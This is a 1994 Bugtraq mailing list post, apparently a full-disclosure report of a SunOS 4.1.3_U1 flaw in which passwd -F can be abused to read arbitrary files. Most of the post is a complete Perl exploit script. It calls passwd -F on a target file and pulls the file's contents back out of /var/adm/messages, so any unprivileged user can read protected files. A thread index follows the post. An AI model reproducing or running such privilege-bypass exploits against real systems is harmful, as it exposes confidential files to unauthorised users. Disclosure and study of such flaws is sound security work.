Bugtraq mailing list archives
passwd -F
From: steve () cati csufresno edu (Steve Mitchell)
Date: Tue, 10 May 94 17:19:53 PDT
FYI, this vulnerability exists on 4.1.3_U1. I do not know how widespread knowledge of this vulnerability is, but I have seen Suns running a modified passwd program that has "-F option disabled" (according to the message output by passwd). So somebody out there has known about it for a while. The following trivial perl script allows non-privileged users to easily read any file on the system. --steve -- Steve Mitchell KD6BET TIP#168 steve_mitchell () csufresno edu "STUFF: Anything that can be used for homebrewing." "JUNK: Everything else you thought could be used for homebrewing, but can't." --Steve Casselman #!/usr/local/bin/perl # # Author disclaims all responsibility for misuse of this script # --sjm 5/10/94 $file = shift || die "Usage: $0 filename\n"; open(A,"</var/adm/messages"); @statf = stat(A); system("/usr/bin/passwd -F $file 1>&2 2>/dev/null"); seek(A,$statf[7],0); while(<A>) { next if !/passwd/; ($stuff,$line) = split(/"/,$_,2); print $line; }
Current thread:
- Re: new iss stuff, (continued)
- Re: new iss stuff Everett F Batey WA6CRE (May 10)
- Re: new iss stuff root () maths su oz au (May 10)
- Re: new iss stuff der Mouse (May 10)
- Re: new iss stuff Timothy Newsham (May 10)
- Re: new iss stuff jallen () nersc gov (May 10)
- Re: new iss stuff Pat Myrto (May 10)
- Re: new iss stuff Andrew Watts (May 10)
- Re: new iss stuff Pat Myrto (May 10)
- Re: new iss stuff Steven C. Blair (May 10)
- iss: _my_ last two cents der Mouse (May 11)
- Re: new iss stuff Pat Myrto (May 10)
- passwd -F Steve Mitchell (May 10)
- Re: passwd -F Pat Myrto (May 10)
- Re: passwd -F Daniel Azuelos (May 11)
- Re: passwd -F Casper Dik (May 11)